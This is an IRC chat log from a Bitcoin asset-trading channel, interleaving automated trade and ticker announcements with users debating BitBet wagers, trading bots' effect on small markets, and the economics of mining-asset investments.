[+] May 24 20:11:06 [HAVELOCK] [ASICM] 3 @ 0.0256 = 0.0768 BTC [+] May 24 20:11:41 nice having the log.bitcoin-assets.com May 24 20:14:44 it is mesmerizing May 24 20:15:52 ;;lag May 24 20:15:52 Error: "lag" is not a valid command. May 24 20:16:09 ;;goxlag May 24 20:16:10 MtGox lag is 1.715716 seconds. During this time, light travels 0.00343827565389 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). May 24 20:18:01 [HAVELOCK] [ASICM] 9 @ 0.0254 = 0.2286 BTC [-] May 24 20:21:24 [BTCTC] [S.DICE-PT] 29 @ 0.00315 = 0.0914 BTC [+] May 24 20:23:03 [MPEX] [S.MPOE] 1344 @ 0.00071465 = 0.9605 BTC [+] May 24 20:26:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [-] May 24 20:28:19 ;;ticker May 24 20:28:20 BTCUSD ticker | Best bid: 131.10001, Best ask: 131.38500, Bid-ask spread: 0.28499, Last trade: 131.10001, 24 hour volume: 36769.14352521, 24 hour low: 125.11000, 24 hour high: 132.02274, 24 hour vwap: 128.59918 May 24 20:28:50 goodness. May 24 20:30:32 [BTCTC] [TAT.ASICMINER] 9 @ 0.0253 = 0.2277 BTC [-] May 24 20:32:20 he is too good for btc Chaaang-Noi May 24 20:37:28 i can't fucking do any work today... May 24 20:37:53 motivatoni is at a 0 May 24 20:38:02 [HAVELOCK] [ASICM] 13 @ 0.025649 = 0.3334 BTC [+] May 24 20:39:02 [HAVELOCK] [HIM] 1 @ 2.475 BTC [+] May 24 20:39:05 while i'm not working at the office, I'm also not watching youtube. much easier to pretend work in terminal window May 24 20:40:07 supercaps May 24 20:40:13 can't wait til that goes mainstream May 24 20:40:30 dunno. May 24 20:40:36 it means my railgun is not far off. May 24 20:41:12 www.youtube.com/watch?v=y54aLcC3G74 May 24 20:41:51 you know what protects babies in cars? the structural cage and the driver. May 24 20:42:21 car seat just prevents broken babies from seatbelts/bouncing baby brains. May 24 20:43:12 deadweasel: you referring to this? http://blog.ted.com/2008/06/24/are_childrens_c/ May 24 20:44:06 nope, but I'll watch later, thanks aknap3 May 24 20:45:38 i don't know May 24 20:45:38 quake 2 May 24 20:45:38 is a big part of it May 24 20:46:02 old desires with no real practicality. May 24 20:46:04 [HAVELOCK] [HIM] 1 @ 2.475 BTC [+] May 24 20:46:32 nope, not unless I had 50MW of solar power generation and shit ton of supercaps May 24 20:47:03 [HAVELOCK] [ASICM] 18 @ 0.025649 = 0.4617 BTC [+] May 24 20:48:02 [HAVELOCK] [VTX] 10 @ 0.443 = 4.43 BTC [-] May 24 20:50:02 [HAVELOCK] [ASICM] 40 @ 0.025649 = 1.026 BTC [+] May 24 20:51:01 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] May 24 20:51:02 [HAVELOCK] [ASICM] 299 @ 0.025649 = 7.6691 BTC [+] May 24 20:52:02 [HAVELOCK] [ASICM] 17 @ 0.02565 = 0.4361 BTC [+] May 24 20:54:08 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [-] May 24 20:55:44 http://bitbet.us/bet/453/block-239905-difficulty-will-be-an-even-number/ May 24 20:55:47 this is going well... May 24 20:56:02 [HAVELOCK] [ASICM] 9 @ 0.025649 = 0.2308 BTC [-] May 24 20:57:24 [BTCTC] [PAJKA.BOND] 38 @ 0.109988 = 4.1795 BTC [+] May 24 20:57:32 I'm surprised that bet was allowed May 24 20:57:36 why ? May 24 20:57:47 because it's way less cool than my bet May 24 20:57:56 lol which ? May 24 20:58:08 Schrödinger's BitBet May 24 20:58:09 This bet will have more total BTC bet on Yes than on No before it closes. May 24 20:58:20 lol May 24 20:58:27 it's like satoshidice, basically May 24 20:58:56 now that's a bet May 24 20:58:59 qxzn something like that May 24 21:00:01 bet like that could have some great earnings potential too May 24 21:00:06 :) May 24 21:00:24 sounds more like a dollar auction. May 24 21:02:02 [HAVELOCK] [ASICM] 97 @ 0.02565 = 2.4881 BTC [+] May 24 21:02:03 [HAVELOCK] [ASICM] 2 @ 0.02565 = 0.0513 BTC [+] May 24 21:02:37 it does May 24 21:02:51 you'd make a lot in bets that were sent just past closing too May 24 21:03:03 trying to get in at the last second with a big bet May 24 21:03:06 yep May 24 21:03:32 could end in some tears May 24 21:03:37 many May 24 21:03:43 yeah, too bfl-ish i think May 24 21:03:55 this is just a clean cut cointoss May 24 21:04:05 yeah it was rejected a while back, but a man can dream May 24 21:04:18 did you zeroconf it ? May 24 21:04:44 what's a zeroconf? May 24 21:04:49 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] May 24 21:04:55 you can send btc in as you make the bet May 24 21:04:58 oh May 24 21:05:01 probly not May 24 21:05:03 but i could May 24 21:05:11 why would you. May 24 21:05:22 if that's all it takes May 24 21:05:23 sorta seals the deal, makes it more likely to get posted May 24 21:05:24 There are currently 5841.4468 bitcoins offered at or under 135.0 USD, worth 783226.881293 USD in total. | Data vintage: 0.0117 seconds May 24 21:05:30 i am in that bitbet May 24 21:05:35 ;;bids 0 May 24 21:05:35 There are currently 13833282 bitcoins demanded at or over 0.0 USD, worth 18996948.4385 USD in total. | Data vintage: 21.5454 seconds May 24 21:05:46 Scrat which one ? May 24 21:05:52 Scrat, odd or even? May 24 21:05:56 small one ofc May 24 21:06:22 I won't say! May 24 21:06:26 kik May 24 21:06:34 scrat is a math genie May 24 21:06:43 i bet he sorted that one has higher odds May 24 21:08:03 ;;nethash May 24 21:08:05 92508.0370922 May 24 21:08:15 ;;bc,stats May 24 21:08:17 Current Blocks: 237723 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 164 blocks | Next Difficulty In About: 23 hours, 42 minutes, and 39 seconds | Next Difficulty Estimate: 12041077.3016 | Estimated Percent Change: 7.63207 May 24 21:08:26 [BTCTC] [ASICMINER-PT] 1 @ 2.490997 BTC [+] May 24 21:08:39 [MPEX] [S.MPOE] 2666 @ 0.00071465 = 1.9053 BTC [+] May 24 21:09:10 the only thing that interests me about the difficulty bet is arbing it when it strays from 505 May 24 21:09:13 50-50 May 24 21:09:44 does bitbet have any decent kind of api? May 24 21:10:05 [BTCTC] [ASICMINER-PT] 1 @ 2.490997 BTC [+] May 24 21:10:12 qxzn what specifically ? May 24 21:10:34 [BTCTC] [TAT.ASICMINER] 26 @ 0.025051 = 0.6513 BTC [-] May 24 21:10:36 not like you could ensure your bet doesnt set it off balance May 24 21:10:36 [BTCTC] [TAT.ASICMINER] 70 @ 0.02505 = 1.7535 BTC [-] May 24 21:10:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.025016 = 0.075 BTC [-] May 24 21:10:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] May 24 21:10:54 [MPEX] [S.MPOE] 14500 @ 0.00071473 = 10.3636 BTC [+] May 24 21:10:56 [MPEX] [S.MPOE] 3434 @ 0.00071608 = 2.459 BTC [+] May 24 21:11:26 [BTCTC] [ASICMINER-PT] 1 @ 2.490998 BTC [+] May 24 21:12:44 mircea_popescu I haven't looked closely at bitbet yet, but like getting the current odds and the sizes behind the odds, I suppose. May 24 21:13:00 ThickAsThieves really that's not calculatable with published information? May 24 21:13:42 i think you'll have to talk to kakobrekla about that. May 24 21:13:45 shouldn't be too hard. May 24 21:14:11 the depositing part works by design in the sense that once you get an addy you can use it for as long as the bet exists May 24 21:15:18 mircea_popescu It's funny, I actually tend not to encourage sites to make apis as I know I can screen-scrape and have less competition :P May 24 21:15:45 uh i hope you use some html dom instead May 24 21:15:52 of screen scrape May 24 21:15:57 yeah i was gonna say, it's pretty much in the html dom May 24 21:16:04 kokbrekla yeah that's what I mean May 24 21:16:12 indeed May 24 21:17:07 if i had a site like that I'd fuck with the html daily to mess with botters May 24 21:17:22 why ? May 24 21:17:41 i think bitting is bad for relatively small markets May 24 21:18:01 i don't see the problem. people setting their own bots to marketmake provides liquidity. May 24 21:18:03 [BTCTC] [ASICMINER-PT] 3 @ 2.491 = 7.473 BTC [+] May 24 21:18:04 potentially zerosum liquidity, adn deters humans May 24 21:18:22 everything that is bitcoin, needs more humans May 24 21:18:28 why'd deter humans ? recall, this is parimutuel. humans knowing their bets will be covered is encouraging May 24 21:18:31 that is what benefits it most May 24 21:18:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.02506 = 0.0501 BTC [+] May 24 21:18:38 [BTCTC] [TAT.ASICMINER] 15 @ 0.025 = 0.375 BTC [-] May 24 21:18:40 [BTCTC] [TAT.ASICMINER] 8 @ 0.025 = 0.2 BTC [-] May 24 21:18:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] May 24 21:18:45 [BTCTC] [TAT.ASICMINER] 7 @ 0.025 = 0.175 BTC [-] May 24 21:18:48 [BTCTC] [TAT.ASICMINER] 6 @ 0.025399 = 0.1524 BTC [+] May 24 21:19:00 because a human will give up fighting a penny bot May 24 21:19:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] May 24 21:19:11 and get frustrated May 24 21:19:14 and trade less May 24 21:19:37 [BTCTC] [PAJKA.BOND] 21 @ 0.109988 = 2.3097 BTC [+] May 24 21:19:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.0249 = 0.0498 BTC [-] May 24 21:19:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.02485 = 0.2485 BTC [-] May 24 21:19:44 [BTCTC] [TAT.ASICMINER] 42 @ 0.024702 = 1.0375 BTC [-] May 24 21:19:55 how would a human fight a penny bettor exactly ? May 24 21:20:05 the human either has a side or doesn't. if he doesn't he;s not betting anyway. May 24 21:20:12 if he does he's glad to hear somebody will cover the odds. May 24 21:20:32 i'm a heavy trader May 24 21:20:33 parimutuel betting is over my head. no wonder mircea_popescu likes it, it's complicated like options. May 24 21:20:33 and it deters me May 24 21:21:02 lol May 24 21:21:18 mircea_popescu this is a losing argument May 24 21:21:19 it would be hard, but I wish there was a way to study it May 24 21:21:19 on something like BTCTC May 24 21:21:21 people "just don't like" bots May 24 21:21:26 it's not rational May 24 21:21:26 [BTCTC] [S.DICE-PT] 4 @ 0.0032 = 0.0128 BTC [+] May 24 21:21:42 except when they are capable of creating their own, of course May 24 21:21:44 ok let's go into a little detail. May 24 21:21:45 then they like them May 24 21:21:50 suppose this bet, with a clear 50-50 odds May 24 21:21:55 suppose somebody wants to bet 5 btc May 24 21:22:03 if he does and it goes to 18-13 and stays there May 24 21:22:09 our guy gets worse than 50-50 odds May 24 21:22:20 if he knows a bot will cover to 18-18 then he knows he gets fair odds May 24 21:22:22 bots = good news. May 24 21:22:35 i was referring to stock exchanges May 24 21:22:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] May 24 21:22:40 not a one-off bet May 24 21:22:42 well that's a diff story. May 24 21:23:02 [HAVELOCK] [ASICM] 15 @ 0.02565 = 0.3848 BTC [+] May 24 21:23:17 indeed May 24 21:23:24 if you are trying to provide liquidity on a stock exchange without a computer, you're going to be frustrated May 24 21:23:25 i mixed it in, apologies May 24 21:23:43 but if you are trying to take liquidity, you might be glad there are bots May 24 21:23:47 tighter spreads May 24 21:24:07 (by "without a computer" i mean "without a bot") May 24 21:24:39 i manage, May 24 21:24:45 but yes it frustrates me May 24 21:25:35 and i imagine it frustrates the newly initiated May 24 21:25:37 which are very valuable to these exchanges May 24 21:25:54 eh, I'm skeptical of the valuable of having a bunch of novice traders bouncing around these exchanges May 24 21:26:00 the value* May 24 21:26:09 an exchange doesn tcare what kind of experience you have May 24 21:26:14 just your volume May 24 21:26:48 eh, I'm skeptical of the valuable of having a bunch of novice traders bouncing around these exchanges << May 24 21:26:54 ThickAsThieves the exchange does care. May 24 21:27:01 the thing that doesn't care is a bucket shop. May 24 21:27:02 [HAVELOCK] [ASICM] 20 @ 0.0254 = 0.508 BTC [-] May 24 21:27:03 [HAVELOCK] [ASICM] 19 @ 0.02532101 = 0.4811 BTC [-] May 24 21:27:03 [HAVELOCK] [ASICM] 13 @ 0.025321 = 0.3292 BTC [-] May 24 21:27:05 [HAVELOCK] [ASICM] 30 @ 0.02532 = 0.7596 BTC [-] May 24 21:27:05 [HAVELOCK] [ASICM] 6 @ 0.0251 = 0.1506 BTC [-] May 24 21:27:06 [HAVELOCK] [ASICM] 50 @ 0.025 = 1.25 BTC [-] May 24 21:27:07 [HAVELOCK] [ASICM] 80 @ 0.025 = 2 BTC [-] May 24 21:27:09 [HAVELOCK] [ASICM] 10 @ 0.024751 = 0.2475 BTC [-] May 24 21:27:10 [HAVELOCK] [ASICM] 176 @ 0.02475 = 4.356 BTC [-] May 24 21:27:11 [HAVELOCK] [ASICM] 400 @ 0.0246 = 9.84 BTC [-] May 24 21:27:12 [HAVELOCK] [ASICM] 250 @ 0.02450001 = 6.125 BTC [-] May 24 21:27:13 can you not picture an envorinment where people say "I dont trade on X, too many f'n bots" May 24 21:27:13 [HAVELOCK] [ASICM] 200 @ 0.0245 = 4.9 BTC [-] May 24 21:27:14 [HAVELOCK] [ASICM] 150 @ 0.02420002 = 3.63 BTC [-] May 24 21:27:14 [HAVELOCK] [ASICM] 155 @ 0.0242 = 3.751 BTC [-] May 24 21:27:15 [HAVELOCK] [ASICM] 300 @ 0.0242 = 7.26 BTC [-] May 24 21:27:16 [HAVELOCK] [ASICM] 50 @ 0.02410001 = 1.205 BTC [-] May 24 21:27:17 [HAVELOCK] [ASICM] 50 @ 0.0241 = 1.205 BTC [-] May 24 21:27:18 [HAVELOCK] [ASICM] 1 @ 0.02404 BTC [-] May 24 21:27:19 [HAVELOCK] [ASICM] 45 @ 0.024 = 1.08 BTC [-] May 24 21:27:57 I anyone is interested, O.USD.P125N < I will sell these puts starting tomorrow = bot current price * .75 = my price May 24 21:28:14 If May 24 21:29:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.024703 BTC [-] May 24 21:29:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.024702 = 0.0494 BTC [-] May 24 21:29:03 [HAVELOCK] [ASICM] 1 @ 0.024 BTC [-] May 24 21:29:05 [BTCTC] [TAT.ASICMINER] 15 @ 0.024701 = 0.3705 BTC [-] May 24 21:29:56 [BTCTC] [TAT.ASICMINER] 51 @ 0.025 = 1.275 BTC [+] May 24 21:30:01 [HAVELOCK] [ASICM] 466 @ 0.024 = 11.184 BTC [-] May 24 21:30:10 !ticker h asicm May 24 21:30:11 [HAVELOCK:ASICM] 1D: 0.02400000 / 0.02499466 / 0.02600000 (13565 shares, 339.05256733 BTC), 7D: 0.01855000 / 0.02373765 / 0.03000000 (126086 shares, 2992.98474507 BTC), 30D: 0.01290000 / 0.02046073 / 0.03000000 (224770 shares, 4598.95817803 BTC) May 24 21:30:20 There are a couple reasons to trade. 1: you are investing. In that case, you don't care about bots. 2: you are arbing/providing liquidity. in that case, you should have bots because it's more efficient in terms of human labor. 3: you are speculating / doing "thinky" fundamentals trading. see case 1. May 24 21:31:12 [BTCTC] [B.YABMC] 17 @ 0.01744 = 0.2965 BTC [+] May 24 21:31:37 is there not added risk to using a bot? May 24 21:31:43 [BTCTC] [B.YABMC] 15 @ 0.01744 = 0.2616 BTC [+] May 24 21:31:45 [BTCTC] [B.YABMC] 1 @ 0.0175 BTC [+] May 24 21:32:10 couldnt it be left holding the bag on a big move? May 24 21:32:34 it's not my area May 24 21:32:52 sure you could May 24 21:32:53 well yes, there are some particular cases where you can beat the bot May 24 21:33:02 just like the bot that went deeply into the bitbet bet thinking it's 50-50 May 24 21:33:08 :) May 24 21:33:11 but then it's discovered the code is bad and odd is twice as common as even May 24 21:33:17 exactly May 24 21:33:30 I sorta throw all that into my case #3 May 24 21:33:39 thinky trading May 24 21:33:45 person knowing it's really 2/3 rather than 50-50 could basically take all the bot's liquidity May 24 21:34:05 bot writers have to be careful about not having their house completely cleaned out May 24 21:34:20 i imagine stock exchange bots could also be gamed then May 24 21:34:21 there are ways to game bots if you are clever, and the bot isn't defensively enough written May 24 21:34:29 like if i wanna find it's lowest ask May 24 21:34:35 i could keep pushing an ask of my own May 24 21:34:41 yes, but you won't beat my bots that way :) May 24 21:35:39 maybe i should start a bot-hunting team May 24 21:35:49 lynch all you nerds! May 24 21:35:51 :) May 24 21:35:56 please do! May 24 21:36:04 make markets more efficient :) May 24 21:36:05 bot vs bots May 24 21:36:11 read an article that touched on that May 24 21:36:33 i know Deprived has some experience in that area May 24 21:36:33 knowing the trading patterns of other bots, when the mean bot saw that the nice bot was gonna start buying, mean bot buys first and then sells to nice bot at a markup May 24 21:37:00 I will also be selling O.USD.C170N = Same terms as above. bot price * 0.75 = my price May 24 21:39:47 Bot market trading is really just the first step of the battle of man versus machine. Soon, they'll start developing weapons and our bodies will be props in the next Terminator movie. May 24 21:40:36 thehehe May 24 21:40:46 furuknap: i can only hope :D May 24 21:41:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.024801 = 0.1488 BTC [-] May 24 21:41:17 [BTCTC] [TAT.ASICMINER] 510 @ 0.0248 = 12.648 BTC [-] May 24 21:41:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.0247 = 0.247 BTC [-] May 24 21:41:38 Bah... May 24 21:43:04 meant to change to Adama, lol May 24 21:43:39 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [+] May 24 21:43:40 whats up queen Amadala May 24 21:43:48 How is your planet May 24 21:44:25 [BTCTC] [ASICMINER-PT] 13 @ 2.491 = 32.383 BTC [+] May 24 21:45:48 [BTCTC] [ASICMINER-PT] 2 @ 2.509999 = 5.02 BTC [+] May 24 21:49:20 [BTCTC] [TAT.ASICMINER] 17 @ 0.024602 = 0.4182 BTC [-] May 24 21:49:47 Seems Tyfus is taking to his senses on the 100TH thing too. https://bitcointalk.org/index.php?topic=140366.msg2258584#msg2258584 May 24 21:50:31 Bah, tytus... That _was_ an honest mistake... May 24 21:50:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [+] May 24 21:51:41 furuknap https://bitcointalk.org/index.php?topic=140366.msg2254951#msg2254951 May 24 21:51:43 you seen that ? May 24 21:51:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.024602 = 0.0738 BTC [-] May 24 21:52:01 [BTCTC] [TAT.ASICMINER] 14 @ 0.024601 = 0.3444 BTC [-] May 24 21:52:20 the bitbet on diff. what digit determines the even number? May 24 21:52:27 Yup, responded too: https://bitcointalk.org/index.php?topic=140366.msg2255369#msg2255369 May 24 21:52:39 11 million is 1 and 1, but 21 million is 2 and 1 May 24 21:55:04 jborkl huh ? May 24 21:57:36 [BTCTC] [ASICMINER-PT] 1 @ 2.50997 BTC [-] May 24 21:59:04 The mining asset market is completely bonkers. Absolutely insane. Its investors are equally utterly and undeniably mad. Most likley, that includes me. There, now I said it. Carry on. May 24 21:59:38 [MPEX] [S.MPOE] 5375 @ 0.00071465 = 3.8412 BTC [-] May 24 21:59:39 [MPEX] [S.MPOE] 7730 @ 0.00071354 = 5.5157 BTC [-] May 24 21:59:46 truth May 24 21:59:46 [MPEX] [S.MPOE] 617 @ 0.00071343 = 0.4402 BTC [-] May 24 21:59:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.025295 = 0.5059 BTC [+] May 24 22:00:53 i've spent more time and money setting up my miners than I'll EVAR get back. May 24 22:00:56 so miners are batshit too. May 24 22:00:57 Miners themselves are even more crazy. May 24 22:00:57 [BTCTC] [TAT.ASICMINER] 6 @ 0.025295 = 0.1518 BTC [+] May 24 22:01:13 Yeah, and that includes me too :-) May 24 22:01:33 [BTCTC] [TAT.ASICMINER] 18 @ 0.025295 = 0.4553 BTC [+] May 24 22:01:42 i think the whole of BTC are borderline personalities May 24 22:01:45 i love it May 24 22:01:47 i'm home May 24 22:01:49 :) May 24 22:01:53 :-D May 24 22:01:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.025295 = 0.253 BTC [+] May 24 22:02:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.025295 = 0.1518 BTC [+] May 24 22:02:36 [BTCTC] [ASICMINER-PT] 1 @ 2.50997 BTC [-] May 24 22:07:27 not particularly mad. just very foolish. May 24 22:08:23 I would argue mad, and by mad I mean that there is no correlation between numbers and decisions and people seem to not notice in the least. May 24 22:09:06 Let me take one example, not very taken out of thin air, and not meant to talk anyone or thing down... May 24 22:09:15 so May 24 22:09:26 one AM share is worth 2.5 BTC? May 24 22:09:54 [BTCTC] [TAT.ASICMINER] 14 @ 0.025298 = 0.3542 BTC [+] May 24 22:09:55 PAJKA bonds are nice little animals run by a seemingly honest person that has been chugging along nicely and yielding a reasonable profit. May 24 22:10:16 [MPEX] [S.MPOE] 14078 @ 0.00071086 = 10.0075 BTC [-] May 24 22:10:43 However, they are capped now at 3MH/s per share and will forever be capped at 15 MH/s when their new ASICs arrive. Which is fine. It's a fixed rate, people should know what they're buying. May 24 22:12:08 Then there's 100TH, which granted isn't delivering yet, but let's just forego that and chalk it up to risk and look at expected revenue. 100TH is fixed at 200MH/s, and if things go according to plan, that will be operational sometime this summer, let's sau August to pick a date. May 24 22:12:48 ...and while everyone is expertly smelling and analyzing mining turds, never before seen pattern emerges unnoticed: *both* s.mpoe and btcusd go up... causes me goosebumps. May 24 22:13:41 You would somehow expect that if PAJKA (or any other bond, really, I'm not picking on them) would be dropping in price to match the value of the share once more powerful bonds like 100TH (or anyone, really and I'm not praising them either) come online. May 24 22:13:57 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [-] May 24 22:13:59 [BTCTC] [ASICMINER-PT] 1 @ 2.48101 BTC [-] May 24 22:14:31 personally i dont understand why anyone would buy a fixed-hash mining asset, unless they were trying to short-term speculate to sell May 24 22:14:56 [BTCTC] [ASICMINER-PT] 3 @ 2.481 = 7.443 BTC [-] May 24 22:15:29 at least with AM, you know they will hold a % of the network May 24 22:15:30 This is the halving effect I've been touting for the past few weeks in practice. We know that once a more powerful bond comes online, the less powerful bonds will drop in dividends. It's simple math, plus and minus. So why aren't anyone even noticing this? May 24 22:15:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.025298 BTC [+] May 24 22:15:54 furuknap you seem so unaware of the fundamental problems of mining for some reason May 24 22:16:03 AM has commited to a minimum of 10% of the network May 24 22:16:05 here's a hint : it is not, overall, a profitable venture on a cash basis approach May 24 22:16:05 [BTCTC] [ASICMINER-PT] 2 @ 2.4801 = 4.9602 BTC [-] May 24 22:16:09 mp, what would that be. May 24 22:16:13 and more likely will hold 25% May 24 22:17:00 Oh, I know that. Mining is an investment in dropping prices. I hate it every time I see BTC go up because I hold some mining May 24 22:17:02 [BTCTC] [ASICMINER-PT] 1 @ 2.4711 BTC [-] May 24 22:17:15 *...I hold some mining assets May 24 22:17:25 there's much more to it than that May 24 22:17:49 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] May 24 22:18:10 The quality of the mining operator, makes a huge difference. A technically challenged person will have a very hard time- even with good equipment May 24 22:18:14 I also know that, I'm a big fan of numbersd, remember? :-) I've run the scenarios so many times I see Excel sheets in the back of my eyelids when I blink. May 24 22:18:34 you must be overcomplicating it May 24 22:18:55 A very technically proficient operator with poorer equipment, can still do well. You have to be good though May 24 22:19:03 not even! May 24 22:19:13 not even what? May 24 22:21:54 furuknap https://bitcointalk.org/index.php?topic=201268.msg2121475#msg2121475 May 24 22:21:56 read that quote. May 24 22:22:45 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] May 24 22:23:22 I've read it previously. I was attending that thread a bit later on. May 24 22:24:33 okay. the point remains : buffett's dilemma May 24 22:24:41 worse than fx issues, worse than the abundance of scammers, May 24 22:24:49 the quote is great insight, but we don't know WHEN that will happen May 24 22:24:50 mining is a commodified market with large excess capacity May 24 22:24:56 ThickAsThieves it happens all the time. May 24 22:25:24 but it could take 2 years for AM to lose dominance May 24 22:25:32 likely less May 24 22:25:37 The commoditizaion is why I want to look at profitability in mining companies over the long term, and thus why I sold out of AM earlier. May 24 22:25:46 but can they not stay a leg up for the foreeable future? May 24 22:25:52 i am personally convinced that satoshi deliberately created the mining trap May 24 22:26:10 as a way to even the playing field (figuring moneyed interest will fall in, independent geeky types will avoid it) May 24 22:26:20 it's fascinating to me to see that it's mostly the idnependents falling in it. May 24 22:26:24 but this off teh records. May 24 22:26:44 ThickAsThieves the problem is not that. the problem is the maintenance cost of that dominance May 24 22:26:50 which is not offset by any dominance benefit. May 24 22:27:17 [MPEX] [S.MPOE] 5528 @ 0.00071608 = 3.9585 BTC [+] May 24 22:27:18 the benefit is that AM both sells textiles AND sewing machines May 24 22:27:41 they can tilt to hardware sales May 24 22:27:47 as appropriate May 24 22:28:02 they already do May 24 22:28:18 no one is shipping, so they will ship May 24 22:28:42 mp, I think I also spoke to that no later than today somewhere :-) Look, I think I understand what you mean, and if I do, my analysis follows that suit, albeit with likely different evaluations of risk and hope. May 24 22:29:52 the life of the mining hardware sales market is surely longer than the mining farm efforts May 24 22:30:09 ThickAsThieves that's not a benefit May 24 22:30:20 the value of the sweing machines is strictly in cutting its textile market May 24 22:30:36 so maybe AM becomes the HP of mining computers May 24 22:30:48 or whichever PC maker example you prefer May 24 22:30:53 ThickAsThieves that's pretty much the only actual alpha scenario here. May 24 22:31:04 the machines are sold at a premium now May 24 22:31:16 priced right on the line of reasonable ROI May 24 22:31:22 this is better than hashing May 24 22:31:27 no? May 24 22:31:49 ThickAsThieves inasmuch as the machines are sold for more than they're worth, the people buying are making a loss May 24 22:31:56 right May 24 22:31:56 there's a finite loss to be thus funneled into investor pockets. May 24 22:32:03 otherwise, it'd have been better to not sell them at all. May 24 22:32:05 so not really. May 24 22:32:28 but it protects the operation from other mining farms May 24 22:32:46 they are mining those blade's lifespand in one sale May 24 22:32:49 now May 24 22:32:54 furuknap nothing wriong with that May 24 22:33:03 [BTCTC] [TAT.ASICMINER] 12 @ 0.025298 = 0.3036 BTC [+] May 24 22:33:16 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] May 24 22:33:30 ThickAsThieves taking the burlington example, the only +ev move is if the war comes and they're converting to making ammo and selling it to the brits on us guaranteed credit. May 24 22:33:45 so ya, maybe we end up with alien messages and am gets a 1.5bn govt grant to crack it May 24 22:33:54 hehe May 24 22:33:57 then there's added value to the pool and everyone's happy May 24 22:34:07 but on the game as it is, the problem looms. May 24 22:34:37 well, i'll get on the board and warn them May 24 22:34:38 ;) May 24 22:34:59 NEVER FORGET BURLINGTON ! May 24 22:37:01 Meanwhile... May 24 22:37:04 ;;ticker May 24 22:37:13 BTCUSD ticker | Best bid: 132.60001, Best ask: 132.70182, Bid-ask spread: 0.10181, Last trade: 132.60001, 24 hour volume: 40837.89188148, 24 hour low: 125.12102, 24 hour high: 133.98000, 24 hour vwap: 129.30293 May 24 22:37:20 nice. May 24 22:47:16 "And to sweeten the deal and get those shares moving I've decided to chuck in my bitcoin advertising earnings from my NSFW monetized Porn blogs as a monthly bonus dividend" <- I mean, c'mon, how can one _not_ take the mining asset market seriously? May 24 22:47:56 "Yeah, we'll develop and sell iPads and iPhones and iMacs and stuff, but we'll also throw in the tips we get from stripping at the local joint" May 24 22:48:52 I was considering waiving my mgmt fee for a while May 24 22:48:52 wait what ?! May 24 22:49:15 link pls May 24 22:49:17 The later one was my parody in an Apple shareholder agreement, if that's what surprised you. May 24 22:49:35 https://www.litecoinglobal.com/security/TRIPLE-B-MINING#tab6 May 24 22:49:54 this shit's pretty good. May 24 22:50:47 Yeah, for some definition of 'good'. May 24 22:51:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.025398 = 0.127 BTC [+] May 24 22:54:22 [MPEX] [S.MPOE] 5900 @ 0.00071899 = 4.242 BTC [+] May 24 22:54:24 [MPEX] [S.MPOE] 13350 @ 0.00071919 = 9.6012 BTC [+] May 24 22:55:43 [BTCTC] [TAT.ASICMINER] 44 @ 0.025399 = 1.1176 BTC [+] May 24 22:56:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.025398 = 0.127 BTC [-] May 24 22:56:30 [BTCTC] [TAT.ASICMINER] 6 @ 0.02543 = 0.1526 BTC [+] May 24 22:58:46 [MPEX] [S.MPOE] 6550 @ 0.00071919 = 4.7107 BTC [+] May 24 22:58:48 [MPEX] [S.MPOE] 6056 @ 0.00072037 = 4.3626 BTC [+] May 24 23:05:02 [HAVELOCK] [ASICM] 1 @ 0.0255 BTC [+] May 24 23:05:04 [HAVELOCK] [ASICM] 72 @ 0.0255 = 1.836 BTC [+] May 24 23:05:05 [HAVELOCK] [ASICM] 8 @ 0.0255 = 0.204 BTC [+] May 24 23:06:02 [HAVELOCK] [HIM] 2 @ 2.489 = 4.978 BTC [+] May 24 23:07:01 [HAVELOCK] [SDICE] 2 @ 0.245 = 0.49 BTC [+] May 24 23:07:08 [BTCTC] [PAJKA.BOND] 2 @ 0.10701 = 0.214 BTC [-] May 24 23:07:10 [BTCTC] [PAJKA.BOND] 1 @ 0.107 BTC [-] May 24 23:07:11 [BTCTC] [PAJKA.BOND] 1 @ 0.107 BTC [-] May 24 23:08:01 [HAVELOCK] [VTX] 1 @ 0.443 BTC [-] May 24 23:08:39 [BTCTC] [TAT.ASICMINER] 28 @ 0.025419 = 0.7117 BTC [-] May 24 23:12:15 pics of the USB miners https://bitcointalk.org/index.php?topic=195052.msg2249127#msg2249127 May 24 23:13:09 not a glowing report May 24 23:13:14 but looks fancy May 24 23:13:27 novelty May 24 23:13:47 he resolved his install issue May 24 23:13:51 if thats what you mean May 24 23:14:03 they mine at +10% advertised May 24 23:14:20 [BTCTC] [ASICMINER-PT] 1 @ 2.4557 BTC [-] May 24 23:14:22 [BTCTC] [ASICMINER-PT] 1 @ 2.4556 BTC [-] May 24 23:14:25 [BTCTC] [ASICMINER-PT] 1 @ 2.4555 